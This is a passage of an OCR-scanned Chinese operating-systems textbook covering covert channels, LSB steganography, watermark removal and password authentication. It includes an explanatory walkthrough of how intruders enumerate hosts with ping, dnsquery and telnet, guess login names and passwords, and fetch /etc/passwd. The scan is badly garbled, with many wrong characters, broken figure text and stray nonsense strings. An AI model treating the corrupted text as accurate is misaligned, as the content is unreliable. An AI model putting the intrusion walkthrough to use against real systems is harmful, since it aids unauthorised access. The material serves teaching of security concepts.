等 级 的 对 象 (不 能 向 下 读 ) 。 


这 些 特性 联合 在 一 起 确保 了 程序 员 可 以 根据 公司 总 裁 的 要 求 更 新 
看 | ] 人 的 信息 ， 但 反 过 来 不 可 以 。 当 然 ， 有些 机 构想 同时 拥有 Bell-La 
Padula 和 Biba 竺 性， 但 它们 之 间 是 矛盾 的 ， 所 以 很 难 同时 满足 。 


9.3.8 隐蔽 信 道 


所 有 的 关于 形式 模型 和 可 证 明 的 安全 系统 听 上 去 都 十 分 有 效 ， 但 
是 它们 能 人 否 真正 工作 ? 人 简单 说 来 是 不 可 能 的 。 甚 至 在 提供 了 合适 安 
模型 并 可 以 证 明 实 现 方法 完全 正确 的 系统 里 ,仍然 有 可 能 发 生 安 全 洪 
露 。 本 将 讨论 已 经 瑚 格 证 明 在 数学 上 泄露 是 不 可 能 的 系统 中 ， 信 息 
是 如 何 泄露 的 。 这 些 观点 要 归功 于 Lampson (1973) ° 


Lampson 的 模型 最 初 是 通过 单一 分 时 系统 阐述 的 ， 但 在 LAN 和 其 他 
一 些 多 用 户 系 统 中 也 采用 了 该 模型 。 该 模型 最 简单 的 方式 是 包含 了 三 
个 运行 在 保护 机 器 上 的 进程 。 第 一 个 进程 是 客户 机 进程 ， 它 让 某 些 工 
作 通 过 第 二 个 进程 也 束 是 服务 事 进 程 来 完成 。 客 户 机 进程 和 服务 紫 进 
程 不 完全 相互 信任 。 例 如 ， 有 上 服务 夯 的 工作 是 帮助 客户 机 来 填写 税 单 。 
客户 机 会 担心 服务 器 秘密 地 记录 下 它们 的 财务 数据 ， 例 如 ， 列 出 谁 赚 
了 多 少 钱 的 秘密 清单 ， 然 后 转手 倒卖 。 服 务 器 会 担心 客户 机 试图 镭 取 
有 价值 的 税务 软件 。 


第 三 个 进程 是 协作 程序 ， 该 协作 程序 正在 同 服务 器 合作 来 鳃 取 客 
户 机 的 机 密 数 据 。 协 作 程 序 和 服务 器 显然 是 由 同一 个 人 掌握 的 。 这 三 
个 进程 如 图 9-14 所 示 。 这 一 例子 的 目标 古 设 计 出 一 种 系统 ， 在 该 系统 
服务 占 进 程 不 能 把 从 客户 机 进程 合法 获得 的 信息 泄露 给 协作 进程 。 


Lampson 把 这 一 问题 叫做 界限 问题 (confinement problem) 。 


客户 机 ”服务 器 协作 程序 进 
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` 隐蔽 信道 


图 9-14 a) 客 户 机 进程 、 服 务 器 进程 和 协作 程序 进程 ，b) 封 装 后 的 服 
务 器 可 以 通过 隐蔽 信道 向 协作 程序 进程 泄露 信息 


从 系统 设计 人 员 的 观点 来 说 ， 设 计 目 标 是 采取 某 种 方法 封闭 或 限 
制服 务 器 ， 使 它 不 能 向 协作 程序 传递 信息 。 使 用 保护 矩阵 架构 可 以 较 
为 容易 地 保证 服务 器 不 会 通过 进程 间 通 信 的 机 制 写 一 个 使 得 协作 程序 
可 以 进行 读 访 问 的 文件 。 我 们 已 可 以 保证 服务 句 不 能 通过 系统 的 进程 
间 通 信 机 制 来 与 协作 程序 通信 。 


遗憾 的 是 ， 系 统 中 仍 存在 更 为 精巧 的 通信 信道 。 例 如 ， 服 务 器 可 
以 笑 试 如 下 的 二 进 制 位 流 来 通信 : 要 发 送 1 时 ， 进 程 在 固定 的 时 间 段 内 
竭尽 所 能 执行 计算 操作 ， 要 发 送 0 时 ， 进 程 在 同样 长 的 时 间 段 内 睡眠 。 


协作 程序 能 够 通过 仔细 地 监控 响应 时 间 来 检测 位 流 。 一 般 而 言 ， 
当 服 务 需 送出 0 时 的 啊 应 比 送出 1 时 的 啊 应 要 好 一 些 。 这 种 通信 方式 叫 
做 隐蔽 信道 (covert channel) ， 如 图 9-14b 所 示 。 


当然 ， 隐 蔽 信道 同时 也 是 嗜 杂 的 信道 ， 包 含 了 大 量 的 外 来 信息 。 
但 是 通过 纠 错 码 《如 汉 明 码 或 者 更 复杂 的 代码 ) 可 以 在 这 样 嘲 杂 的 信 
道中 可 靠 地 传递 信息 。 纠 错 码 的 使 用 使 得 市 宽 已 经 很 低 的 隐蔽 信道 变 
得 更 罕 ， 但 仍 有 可 能 泄露 真实 的 信息 。 很 明显 ， 没 有 一 种 基于 对 象 矩 
阵 和 域 的 保护 模式 可 以 防止 这 种 泄露 。 


调节 CPU 的 使 用 率 不 是 惟一 的 隐蔽 信道 ， 还 可 以 调制 页 率 (多 个 
页 面 错 误 表 示 1， 没 有 页 面 错 误 表 示 0) 。 实 际 上 ， 在 一 个 计时 方式 
里 ， 几 乎 任何 可 以 降低 系统 性 能 的 途径 都 可 能 是 隐蔽 信道 的 候选 。 如 
果 系 统 提供 了 一 种 锁定 文件 的 方法 ， 那 么 系统 就 可 以 把 锁定 文件 表示 
为 1， 解 锁 文 件 表示 为 0。 在 某 些 系统 里 ， 进 程 也 可 能 检测 到 文件 处 于 
不 能 访问 的 锁定 状态 。 这 一 隐蔽 信道 如 图 9-15 所 示 ， 图 中 对 服务 器 和 协 
作 程 序 而 言 ， 在 某 个 固定 时 间 内 文件 的 锁定 或 未 锁定 都 是 已 知 的 。 在 
这 一 实例 中 ， 在 传送 的 秘密 位 流 是 11010100。 
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图 9-15 使 用 文件 加 锁 的 隐蔽 信道 


锁定 或 解锁 一 个 预 置 的 文件 ， 且 S 不 是 在 一 个 特别 嗜 杂 的 信道 里 ， 
并 不 需要 十 分 精确 的 时 序 ， 除 非 比 特 率 很 慢 。 使 用 一 个 双方 确认 的 通 
信 协 议 可 以 增强 系统 的 可 靠 性 和 性 能 。 这 种 协议 使 用 了 2 个 文件 F1 和 
F2。 这 两 个 文件 分 别 被 服务 右 和 协作 程序 锁定 以 保持 两 个 进程 的 同 
步 。 当 服务 大 锁定 或 解锁 $ 后 ， 它 将 F1 的 状态 反 置 表示 送出 了 一 个 比 
特 。 一 旦 协作 程序 读 取 了 该 比特 ， 它 将 F2 的 状态 反 置 告知 服务 器 可 以 
送出 下 一 个 比特 了 ， 直 到 F1 被 再 次 反 营 表示 在 S 中 第 二 个 比特 已 送 达 。 
由 于 这 里 没有 使 用 时 序 技术 ， 所 以 这 种 协议 是 完全 可 靠 的 ， 并 且 可 以 
在 索 忙 的 系统 内 使 它们 得 以 按 计划 快速 地 传递 信息 。 也 许 有 人 会 问 : 
要 得 到 更 高 的 带宽 ， 为 什么 不 在 每 个 比特 的 传输 中 都 使 用 文件 呢 ? 或 
者 建立 一 个 字 节 党 的 信道 ， 使 用 从 S0 到 S7 共 8 个 信号 文件 ? 


获取 和 释放 特定 的 资源 (磁带 机 、 绘 图 仪 等 ;也 可 以 用 来 作为 信 
写 方 式 。 服 务 右 进程 获取 资源 时 表示 发 送 1 信和 号， 释放 资源 时 表示 发 送 
0 信号 。 在 UNIX 里 ， 服 务 器 进程 创建 文件 表示 1， 删 除 文件 表示 0; 协 
作 程 序 可 以 通过 系统 访问 请 求 来 查看 文件 是 否 存 在 。 即 使 协作 程序 没 
有 使 用 文件 的 权限 也 可 以 通过 系统 访问 请 求 来 得 看 。 然 而 很 不 幸 ， 仍 
然 还 存在 许多 其 他 的 隐蔽 信道 。 


Lampson 也 提 到 了 把 信息 泄露 给 服务 器 进程 所 有 者 (A) 的 方法 。 
服务 占 进 程 可 能 有 资格 告诉 其 所 有 着 ， 它 已 经 共和 客户 机 完成 了 多 少 工 
作 ， 这 样 可 以 要 求 客 户 机 付 账 。 如 ， 假 设 真正 的 计算 值 为 100 美 元 ， 而 


客户 收入 是 53 000 美 元 ， 那 么 服务 絮 就 可 以 报告 100.53 美 元 来 通知 自己 
的 主人 。 


仅仅 找到 所 有 的 隐蔽 信道 已 经 苹 非 常 困 难 的 了 ， 更 不 用 说 阻止 它 

们 了 。 实 际 上 ， 没 有 什么 可 行 的 方法 。 引 入 一 个 可 随机 产生 页 面 调用 

错误 的 进程 ， 或 为 了 减少 隐蔽 信道 的 市 宽 而 花费 时 间 来 降低 系统 性 能 
等 ， 都 不 是 什么 诱 人 的 好 主意 。 


隐 写 术 


另 一 类 稍微 不 同 的 隐蔽 信道 能 够 在 进程 间 传 着 机 密 信息 ， 即 使 人 
为 或 自动 的 审查 监视 着 进程 间 的 所 有 信息 并 禁止 可 颖 的 数据 传递 。 例 
如 ， 假 设 一 家 公司 人 为 地 检查 所 有 发 目 公 司职 员 的 电子 邮件 来 确 你 没 
有 机 密 港 露 给 公司 外 的 竞争 对 手 或 同谋 。 雇 员 是 否 有 办 法 在 审查 着 的 
ST Pia are PLA VE? 结果 是 可 能 的 。 


让 我 们 用 例子 来 证 明 。 请 看 图 9-16a， 这 是 一 张 在 肯尼亚 拍摄 的 照 
片 ， 照 片上 有 三 只 斑马 在 注视 着 金 合 欢 树 。 图 9-16b 看 上 去 和 图 9-16a 差 
不 多 ,但 古 却 包含 了 附加 的 信息 。 这 些 信息 是 完整 而 未 个 删 三 的 五 部 
莎士比亚 戏剧 : CTER ` LERE) ` nA) ` ENT 
商人 》 和 《 胡 力 斯 忆 撤 》。 这 些 戏剧 尽 共 加 起 来 超过 700KB 的 文本 。 


图 9-16 a= RRS RM; b) 三 只 斑马 、 一 棵 树 以 及 五 部 莎 士 比 
亚 完 整 的 戏剧 


隐蔽 信道 古 如 何 工作 的 呢 ? 原来 的 彩色 图 片 是 1024x768 像 取 的 。 
每 个 像素 包括 三 个 8 位 数字 ， 分 别 代 表 红 、 绿 、 蓝 三 原色 的 亮度 。 像 素 
的 颜色 是 通过 三 原色 的 线性 重 受 形成 的 。 编 码 程 序 使 用 每 个 RGB 色 度 
的 低位 作为 隐 菩 信道。 这样 每 个 像素 加 有 三 位 的 秘密 空间 存放 信息 ， 
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况 下 ， 图 片 大 小 将 增加 1024x768x3 位 或 294 912 个 字 市 的 空间 来 存放 信 
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五 部 戏剧 和 一 份 简短 说 明 加 起 来 有 734 891 个 字 节 。 这 些 内 容 首 先 
被 标准 的 压缩 算法 压缩 到 274KB ， 压 缩 后 的 文件 加 密 后 被 插入 到 每 个 
色 值 的 低位 中 。 正 如 我 们 所 看 到 的 (实际 上 看 不 到 ) ， 存 放 的 信息 完 
全 是 不 可 见 的 ， 在 放大 的 、 全 彩 的 照片 里 也 是 不 可 见 的 。 一 旦 图 片 文 


件 通 过 了 审查 ， 接 收 者 就 剥离 低位 数据 ， 利 用 解码 和 解压 缩 算法 还 原 
出 743 891 个 字 节 。 这 种 隐藏 信息 的 方法 叫做 隐 写 术 (steganography 

RA THe GAB Ss”) 。 隐 写 术 在 那些 试图 限制 公民 通信 自由 的 
独裁 统治 国家 里 不 太 流 行 ， 但 在 那些 非常 有 言论 目 由 的 国家 里 却 十 分 


流行 。 


在 低 分 辨 紊 下 观看 这 两 张 黑 日 照片 并 不 能 让 人 领略 隐 写 术 的 高 超 
技巧 。 要 更 好 地 理解 隐 写 术 的 工作 原理 ， 作 者 提供 了 一 个 施 例 ， 它 包 
含有 图 9-16b 中 的 图 像 。 这 一 范例 可 以 在 www.cs.vu.nl/~ast/ 上 找到 。 只 
要 点 击 covered writing 下 面 以 STEGANOGRAPHY DEMO 开头 的 链接 即 
可 。 页 面 上 会 指导 用 户 下 载 图 片 和 所 需 的 隐 写 术 工 具 来 释放 戏剧 文 
本 。 


另 一 个 隐 写 术 的 使 用 是 把 隐藏 的 水 印 插 入 网 页 上 的 图 片 中 以 防止 
窃取 者 用 在 其 他 的 网 页 上 。 如 果 你 网 页 上 的 图 片 包含 以 下 秘密 信 
息 : “Copyright 2008,General Images Corporation”， 你 就 很 难说 服 法 官 这 
是 你 自己 制作 的 图 片 。 音乐 、 电 影 和 其 他 素材 都 可 以 通过 加 入 水 印 来 
EEI ° 
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可 以 攻击 在 像素 低位 嵌入 信息 的 技术 : 首先 把 图 像 顺 时 针 转 动 1 度 ， 然 
后 把 它 转 换 为 JPEG 这 样 有 损耗 的 图 片 格式 ， 再 逆 时 针 转 1 度 ， 最 后 图 片 
被 转换 为 原来 的 格式 (如 gif，bmp，tif 等 ) 。 有 损耗 的 JPEG 格 式 会 通 


过 浮 点 计算 来 混合 处 理 像素 的 低位 ， 这 样 会 导致 四 舍 五 入 的 发 生 ， 同 
时 在 低位 增加 了 噪声 信息 。 不 过 ， 放 置 水 印 的 人 们 也 考虑 (或 者 应 该 
考虑 ) 到 了 这 种 情况 ， 所 以 他 们 重复 地 壬 入 水 印 并 使 用 其 他 的 一 些 方 
法 。 这 反 过 来 又 促使 了 攻击 者 寻找 更 好 的 手段 去 除 水 印 。 结 末 ， 这 样 
的 对 抗 周而复始 。 


94 认证 


每 一 个 安全 的 计算 机 系统 一 定 会 要 求 所 有 的 用 户 在 登录 的 时 候 进 
行 号 份 认证 。 如 采 操 作 系统 无 法 确定 当前 使 用 该 系统 的 用 户 的 喘 份 ， 
则 系统 无 法 决定 哪些 文件 和 资源 是 该 用 户 可 以 访问 的 。 表 面 上 看 认证 
似乎 是 一 个 微不足道 的 话题 ， 但 它 远 比 大 多 数 人 想象 的 要 复杂 。 


用 户 认证 是 我 们 在 1.5.7 部 分 所 阐述 的 “个 体重 复 系 统 发 育 " 事 件 之 
一 。 早 期 的 主机 ， 如 ENIAC 并 没有 操作 系统 ， 更 不 用 说 去 登录 了 。 后 
续 的 批 处 理 和 分 时 系统 通 钊 有 为 用 户 和 作业 的 认证 提供 登 孙 服务 的 机 
制 。 


早期 的 小 型 计算 机 〈 如 PDP-1 和 PDP-8) 没有 登录 过 程 ， 但 是 随 着 
UNIX 损 作 系统 在 PDP-11 小 型 计算 机 上 的 广泛 使 用 ， 又 开始 使 用 登录 过 
程 。 早 先 的 个 人 计算 机 (如 Apple II 和 最 初 的 BM PC) 没有 登录 过 程 ， 
但 是 更 复杂 的 个 人 计算 机 操作 系统 ， 如 Linux 和 Windows Vista 需 要 安全 
登录 (然而 有 些 用 户 却 将 登录 过 程 去 除 ) 。 公 司 局 域 网 内 的 机 器 设置 
了 不 能 被 跳 过 的 登录 过 程 。 今 天 很 多 人 都 直接 登录 到 远程 计算 机 上 ， 
享受 网 银 服务 、 网 上 购物 、 下 载 音乐 ， 或 进行 其 他 商业 活动 。 所 有 这 
些 都 要 求 以 登录 作为 认证 身份 的 手段 ， 因 此 认证 再 一 次 成 为 与 安全 相 
关 的 重要 话题 。 
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实现 它 。 当 人 们 试图 登录 系统 时 ， 大 多 数 用 户 登 孙 的 方法 基于 下 列 三 
个 方面 考虑 : 


1) 用 户 已 知 的 信息 。 
2) 用 户 已 有 的 信息 。 


3) 用 户 是 谁 。 


有 些 时 候 为 了 达到 更 高 的 安全 性 ， 需 要 同时 满足 上 面 的 两 个 方 
面 。 这 些 方面 导致 了 不 同 的 认证 方案 ， 它 们 具有 不 同 的 复杂 性 和 安全 
性 。 我 们 将 依次 论述 。 


那些 想 在 某 系 统 上 和 郑 麻 烦 的 人 首先 必须 登录 到 系统 上 ， 这 决定 了 
我 们 要 采用 哪 一 种 认证 方法 。 通 种 ， 我 们 把 这 些 人 叫做 “黑客 ”。 但 
征 ， 在 计算 机 界 , “墨客 ?是 对 资深 程序 员 的 采 誉 称呼 。 他 们 中 也 许 有 
一 些 是 欺诈 性 的 ， 但 大 多 数 人 并 不 是 。 我 们 在 这 方面 理解 错 了 。 考 虑 
到 黑客 真正 的 含义 ， 我 们 应 该 恢复 他 们 的 名 声 ， 并 把 那些 企图 非法 问 
入 计算 机 系统 的 人 归结 到 骇 客 (Cracker) 一 类 。 通 常 < 黑客 ”被 分 为 并 
不 从 事 违 法 活动 的 “日 帽子 黑客 ”和 从 事 破 坏 活动 的 “ 墨 帽子 黑客 ”。 在 人 
们 的 经 验 中 ， 绝 大 多 数 “黑客 ”长 时 间 示 在 宇内 ， 而 且 并 不 戴 帐 子 ， 所 
以 事实 上 很 难 通过 他 们 的 帽子 来 区 分 “墨客 ”的 好 坏 。 


9.4.1 使 用 口令 认证 


最 广泛 使 用 的 认证 方式 是 要 求 用 户 输 入 登录 名 和 口令 。 口 令 保护 
很 容易 理解 ， 也 很 容易 实施 。 最 简单 的 实现 方法 是 保存 一 张 包含 登录 
名 和 口令 的 列表 。 登 录 时 ， 通 过 查找 登录 名 ， 得 到 相应 的 口令 并 与 输 
入 的 口令 进行 比较 。 如 末 匹 配 ， 则 允许 登录 ， 如 来 不 匹配 ， 登 好 被 拒 
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量 无 疑问 ， 在 输入 口令 时 ， 计 算 机 不 能 显示 被 输入 的 字符 以 防 在 
终端 周围 的 好 事 之 徙 看 到 。 在 Windows 系 统 中 ， 将 每 一 个 输入 的 口令 字 
符 显示 成 星 号 。 在 UNIX 系 统 中 ， 口 令 被 输入 时 没有 任何 显示 。 这 两 种 
认证 方法 是 不 同 的 。Windows 也 许 会 让 健生 的 人 在 输入 口令 时 看 看 输 进 
了 几 个 字符 ， 但 也 把 口令 长 度 泄露 给 了 “ 偷 听 者 ”。 (因为 某 种 原因 ， 
英语 有 一 个 词汇 专门 表示 偷 听 的 意思 ， 而 不 是 表示 偷 颖 ， 这 里 不 是 叶 
咕 的 意思 ， 这 个 词 在 这 里 不 适用 。) 从 安全 角度 来 说 ， 沉 默 是 金 。 


男 一 个 设计 不 当 的 方面 出 现 了 严重 的 安全 问题 ， 如 9-17 所 示 。 在 图 
9-17a 中 显示 了 一 个 成 功 的 登录 信息 ， 用 户 输入 的 是 小 写字 母 ， 系 统 输 
出 的 是 大 写 了 字母 。 在 图 9-17b 中 ， 显 示 了 物 客 试图 登录 到 系统 A 中 的 失 
败 信息 。 在 图 9-17c 中 ， 显 示 了 驴 客 试图 登录 到 系统 B 中 的 失败 信息 。 


LOGIN: carol 


LOGIN: Mitch LOGIN: carol PASSWORD: Idunno 
PASSWORD: FooBar!-7 INVALID LOGIN NAME INVALID LOGIN 
SUCCESSFUL LOGIN LOGIN: LOGIN: 

a) b) c) 


图 9-17 a) 一 个 成 功 的 登录 ; b) 输 入 登录 名 后 被 拒绝 ，c] 输 入 登录 名 
和 口令 后 被 拒绝 


在 图 9-17b 中 ， 系 统 只 要 看 到 非法 的 登录 名 束 茶 止 登录 。 这 样 做 是 
一 个 错误 ， 因 为 系统 让 驴 客 有 机 会 竹 试 ， 直 到 找到 合法 的 登录 名 。 在 
图 9-17c 中 ， 无 论 物 客 输入 的 是 合法 还 古 非 法 的 登录 名 ， 系 统 部 要 求 输 
入 口令 并 没有 给 出 任何 反馈 。 驴 客 所 得 到 的 信息 只 古 登 录 名 和 口令 的 


组 合 是 错误 的 。 


大 多 数 笔记 本 电脑 在 用 户 登 录 的 时 候 要 求 一 个 用 户 名 和 密码 来 保 
护 数 据 ， 以 防止 笔记 本 电脑 失窃 。 然 而 这 种 保护 在 有 些 时 候 却 收效 其 
微 ， 任 何 拿 到 笔记 本 的 人 都 可 以 在 计算 机 启动 后 迅速 癌 击 DEL、F8 或 
相关 按键 ， 并 在 受 保护 的 操作 系统 启动 前 进入 BIOS 配 置 程序 ， 在 这 里 
计算 机 的 启动 顺序 可 以 被 改变 ， 使 得 通过 USB 端 口 启动 的 检测 先 于 对 
从 硬盘 启动 的 检测 。 计 算 机 持 有 者 此 时 插入 安装 有 完整 操作 系统 的 
USB 设 备 ， 计 算 机 便 会 从 USB 中 的 操作 系统 启动 ， 而 不 是 本 机 硬盘 上 
的 操作 系统 启动 。 计 算 机 一 旦 启动 起 来 ， 其 原 有 的 硬盘 则 被 挂 起 (在 
UNIX 操 作 系 统 中 ) 或 被 映射 为 D 盘 驱动 器 (在 Windows 中 ) 。 因 此 ， 
绝 大 多 数 BIOS 都 允许 用 户 设置 密码 以 控制 对 BIOS 配 置 程序 的 修改 ， 在 


密码 的 保护 下 ， 只 有 计算 机 的 真正 拥有 者 才 可 以 修改 计算 机 启动 顺 
序 。 如 果 读 首 拥有 一 台 笔记 本 电脑 ， 那 么 请 先 放下 本 书 ， 先 为 BIOS 设 
置 一 个 密码 。 
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大 多 数 骇 客 通过 远程 连接 到 目标 计算 机 〈 比 如 通过 Internet) `% 
试 多 次 登录 (登录 名 和 口令 ) 的 方法 找到 进入 系统 的 渠道 。 许 多 人 使 
用 自己 的 名 字 或 名 字 的 某 种 形式 作为 登录 名 。 如 对 Ellen Ann Smith 来 
Ui, ellen ` smith ` ellen_smith 、ellen-smith ` ellen.smith ` esmith ` 
easmith FÉR A] BEAUTY FoR o FR FSE — A fi (4096 Names for 
Your New Baby) 4096 个 为 婴儿 准备 的 名 字 的 书 外 加 一 本 人 对 有 大 量 名 字 
的 电话 本 ， 就 可 以 对 打算 攻击 的 国家 计算 机 系统 编辑 出 一 长 串 洪 在 的 
登录 名 〈 如 ellen_smith 可 能 是 在 美国 或 英国 工作 的 人 ， 但 在 日 本 却 行 不 
通 ) 。 


当然 ， 仅 仅 猜 出 登录 名 是 不 够 的 。 骇 客 还 需要 猜 出 登录 名 的 口 
令 。 这 有 多 难 呢 ? 简单 得 超过 你 的 想象 。 最 经 典 的 例子 是 Morris 和 
Thompson (1979) 在 UNIX 系 统 上 所 做 的 安全 口令 和 尝试。 他 们 编辑 了 一 
长 串 可 能 的 口令 : 名 和 姓氏 、 路 名 、 城 市 和 名、 字典 里 中 等 长 度 的 单词 
(也 包括 倒 过 来 拼写 的 ) 、 许 可 证 号 码 和 许多 随机 组 成 的 字符 串 。 然 
后 他 们 把 这 一 名 单 同 系统 中 的 口令 文件 进行 比较 ， 看 看 有 多 少 被 猜 中 


的 口令 。 结 果 有 86% 的 口令 出 现在 他 们 的 名 单 里 。Klein (1990) 也 得 
到 过 同样 类 似 的 结果 。 


也 许 有 人 认为 优秀 的 用 户 会 挑选 特别 的 口令 ， 实 际 上 许多 人 并 没 
有 这 人 么 做 。 一 份 1997 年 伦敦 金融 部 门 关 于 口令 的 调查 报告 显示 ，829% 的 
口令 可 以 被 轻易 猜 出 。 通 和 党 被 用 户 采 用 的 口令 包括 : Pail > BS 
语 、 人 名 〈 家 庭 成 员 或 体育 明星 ) 、 上 度假 地 和 办 公 室 浓 见 的 物体 
(Kabay, 1997) 。 这 样 ， 驴 客 不 费 吹 灰 之 力 就 可 以 编辑 出 一 系列 潜在 
的 登录 名 和 口令 。 


网 络 的 普及 使 得 这 一 情况 更 加 恶化 。 很 多 用 户 并 不 只 拥有 一 个 密 
码 ， 然 而 由 于 记 住 多 个 见长 的 密码 是 一 件 困难 的 事情 ， 因 此 大 多 数 用 
户 都 趋向 于 选择 简单 旦 强度 很 弱 的 密码 ， 并 旦 在 多 个 网 站 中 重复 使 用 
他 们 (Florencio 和 Herley，2007; Gaw 和 Felten,2006) ° 


如 果 口 令 很 容易 被 猜 出 ， 真 的 会 有 什么 影响 吗 ?” 当然 有 。1998 
年 ，《 圣 何 塞 信使 新 闻 》 报 告 说 ， 一 位 在 Berkeley 的 居民 Peter 
Shipley， 组 装 了 好 几 台 未 被 使 用 的 计算 机 作为 军用 拨号 器 (war 
dialer) ， 拨 打 了 某 一 个 分 局 内 的 10 000 个 电话 号 码 [ 如 (415) 770- 
XXXxx]。 这 些 号 码 是 被 随机 拨 出 的 ， 以 防 电话 公司 禁用 措施 和 跟踪 检 
测 。 在 拨打 了 大 约 260 万 个 电话 后 ， 他 定位 了 旧金山 湾 区 的 20 000 台 计 
算 机 ， 其 中 约 200 台 没有 任何 安全 防范 。 他 估计 一 个 别有用心 的 骇 客 可 


以 破译 其 他 75% 的 计算 机 系统 (Denning, 1999) 。 这 就 回 到 了 侏 罗 纪 
时 代 ， 计 算 机 实际 只 需 拨打 所 有 260 万 个 电话 号 码 。 间 | 


并 不 只 有 加 利 福 尼 亚 州 才 有 这 样 的 骇 客 ， 一 个 澳大利亚 骇 客 曾经 
做 过 同样 的 党 试 。 在 这 个 骇 客 疤 入 的 系统 中 有 在 沙特 阿拉 伯 的 花旗 银 
行 的 计算 机 ， 使 他 能 够 获得 信用 卡号 码 、 信 用 和 额度 (如 500 万 美元 ) 和 
交易 记 采 。 他 的 一 个 同伴 也 曾 问 入 过 银行 计算 机 系统 ， 盗 取 了 4000 个 
信用 卡号 (Denning, 1999) 。 如 果 波 用 这 样 的 信息 ， 银 行 晕 无 疑问 会 
极力 否认 目 己 有 错 ， 而 声称 一 定 是 客户 泄露 了 信息 。 


互联 网 是 上 帝 赐 给 骇 客 的 最 好 的 礼物 ， 它 帮助 骇 客 扫 清 了 入 侵 计 
算 机 过 程 中 的 绝 大 多 数 采 烦 ， 不 需要 拨打 更 多 的 电话 号 码 ， 军 用 拨号 
器 可 以 按 下 面 的 方式 工作 。 每 一 台 联 入 互联 网 的 计算 机 都 有 一 个 (32 
位 的 ) IP 地 址 (IP Address) 。 人 们 通常 把 这 些 地 址 写成 十 进 制 点 符 
， 如 w.x.y.z， 每 一 个 字母 代表 从 0 到 255 的 十 进 制 IP 地 址 。 驴 客 可 以 非 
容易 地 测试 拥有 这 类 IP 地 址 的 计算 机 ， 并 通过 向 shell 或 控制 台中 输入 
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aK up 


=) 


ping w.x.y.z 


来 判断 该 计算 机 是 否 在 网 上 。 如 末 计 算 机 在 网 上 ， 它 将 发 出 回复 
言 息 并 告知 走 一 个 来 回 需要 多 少 毫秒 (虽然 某 些 网 站 屏蔽 了 ping 命 令 以 
防 攻击 ) 。 黑 客 很 容易 写 一 个 程序 来 自动 发 射 大 量 的 人 PP 地址， 当然 也 


可 以 让 军用 拨号 器 来 做 。 如 果菜 人 台 计 算 机 被 发 现在 网 上 的 IP 地 址 为 
W.X.y.z， 驶 客 束 可 以 通过 输入 


telnet w.x.y.z 


如 采 联 机 壬 试 被 允许 (也 可 能 被 拒绝 ， 因 为 不 是 所 有 的 系统 管理 
员 欢 迎 通过 Internet 来 登录 ) ， 骇 客 就 能 够 开始 从 他 的 名 单 中 尝试 登录 
名 和 口令 。 起 初 可 能 会 失败 ， 但 随 看 几 次 尝试 后 ， 骇 客 最 后 总 是 能 进 
入 系统 并 获取 口令 文件 ( 通 第 位 于 UNIX 系 统 的 /etc/passwd 下 ， 而 且 对 
公众 是 可 读 的 ) 。 然 后 ， 他 开始 收集 关于 登录 名 使 用 频率 等 统计 信息 
来 优化 进一步 的 搜索 。 


许多 telnet (远程 登录 ) 后 台 程 序 在 骇 客 尝试 了 许多 不 成 功 的 登录 
后 会 暂停 潜在 的 TCP 连 接 ， 以 降低 驴 客 的 连接 速度 。 骇 客 这 时 会 同时 局 
动 奉 干 个 并 行 线程 ， 一 次 攻击 不 同 的 目标 。 他 们 的 目标 是 在 一 秒 中 内 
进行 尽 可 能 多 的 符 试 ， 利 用 尽 可 能 多 的 带宽 。 从 他 们 的 观点 来 说， 同 
时 攻击 好 几 合计 算 机 并 不 是 一 个 严重 的 缺陷 。 


除了 依次 ping 计 算 机 的 IP 地 址 外 ， 骇 客 还 可 以 攻击 公司 、 大 学 或 其 
他 政府 性 组 织 等 目标 ， 如 地 址 为 foobaredu 的 Foobar 大 学 。 骇 客 通 过 输 
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dnsquery foobar.edu 


就 可 以 查 到 该 大 学 的 一 长 串 IP 地 址 ， 也 可 以 使 用 nslookup 或 者 dig 程 
Fe (还 可 以 通过 向 机 器 中 键入 “DNS query” 来 从 网 络 中 查找 可 以 进行 免 
费 DNS 查 询 的 网 站 ， 例 如 www.dnsstuff.com) 。 因 为 许多 机 构 都 拥有 65 
536 个 连续 的 IP 地 址 (过 去 常用 的 一 整个 分 配 单元 ， 所 以 骇 客 一 旦 得 
到 IP 地 址 的 前 2 个 字 节 (dnsquery 命 令 的 结果 ) ， 就 可 以 连续 地 使 用 ping 
命令 来 看 一 看 哪些 地 址 有 回应 ， 并 且 可 以 接受 telnet 和 连接。 完成 这 一 步 
后 ， 驴 客 束 可 以 通过 我 们 前 面 所 介绍 的 猜 用 户 名 和 口令 的 方法 问 入 系 


统 。 


毫 无 疑问 ， 从 解析 主机 名 称 找到 耳 地 址 的 前 2 个 字 节 ， 到 ping 所 有 
的 地 址 看 哪些 有 反应 ， 再 看 这 些 地 址 是 否 支 持 telnet 连 接 ， 到 最 后 大 量 
地 进行 诸如 (登录 名 和 口令 ) 对 一 类 的 猜测 ， 这 些 过 程 都 可 以 很 好 地 
目 动 完成 。 这 一 过 程 会 进行 大 量 的 等 试 ， 以 便 阅 入 ， 而 且 如 果 骇 客 的 
计算 机 性 能 稳定 的 话 ， 可 以 不 断 地 重复 运行 某 些 命令 直到 进入 系统 。 
一 个 拥有 高 速 电缆 或 DSL 连 接 的 骇 客 可 以 一 整 天 让 计算 机 自动 演 试 进 
入 某 个 系统 ， 而 他 所 做 的 只 是 偶尔 看 一 下 十 否 有 反馈 信息 。 


除了 远程 登录 服务 (telnet service) 以 外 ， 很 多 计算 机 还 提供 了 很 
多 其 他 可 以 应 用 于 互联 网 的 服务 。 每 个 服务 都 与 65 536 个 端口 (port) 
中 的 一 个 相关 联 (attach) ， 当 骇 客 找到 了 一 个 活动 的 耳 地 址 ， 通 常情 
况 下 他 会 执行 端口 扫描 (port scan) 来 确定 每 个 端口 允许 哪些 服务 。 某 


些 端口 可 能 会 提供 额外 的 服务 ， 而 骇 客 则 可 能 利用 这 些 服务 侵入 系 


使 用 telnet 攻 击 或 端口 扫描 很 明显 比 军 用 拨号 器 要 快 〈 无 须 拨号 时 
H) ， 而 且 成 本 低 (无 须 长 途 电 话费 ) 。 但 它 仅 适用 于 攻击 Internet 上 
的 计算 机 和 telnet 连 接 。 而 的 确 有 许多 公司 (包括 几乎 所 有 的 大 学 ) 都 
接受 telnet 连 接 ， 以 保证 雇员 在 出 差 时 或 在 不 同 的 办 公 室 (或 在 家 里 的 


学 生 ) 进行 远程 登录 。 


不 仅 用 户口 令 如 此 脆弱 ， 而 且 超 级 用 户口 令 有 时 也 十 分 脆弱 。 特 
别 是 有 些 刚刚 安装 好 的 服务 器 从 不 更 改 出 广 时 的 默认 口令 。 一 位 
Berkeley 大 学 的 天 文学 家 Cliff Stoll 曾 经 观测 到 自己 计算 机 系统 的 不 正 
